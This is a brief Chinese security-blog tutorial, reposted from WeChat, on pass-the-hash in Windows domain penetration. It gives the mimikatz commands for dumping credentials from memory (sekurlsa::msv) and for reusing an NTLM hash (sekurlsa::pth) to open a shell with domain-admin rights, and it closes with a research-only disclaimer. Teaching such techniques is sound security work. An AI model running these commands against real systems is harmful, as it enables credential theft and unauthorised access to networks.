0X01 简介
文章参考:
无域控权限
运行mimikatz(需管理员权限,实验环境为了方便省去了提权操作)
privilege::debug\提升权限
log\日志
如果执行privilege::debug报错,可能是权限问题
sekurlsa::msv//获取信息
sekurlsa::pth /user:Administrator(Username) /domain:test(Domain) /ntlm:e1bd9dcbc5f2e08a21e23f3c890aaff7(NTLM)
执行后会弹出一个CMD窗口
新窗口获取域控权限
回复“加群”,获取群号。
侵删!
原文始发于微信公众号(皓月的笔记本):【知识整理】域渗透之Hash传递(Pass The Hash)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论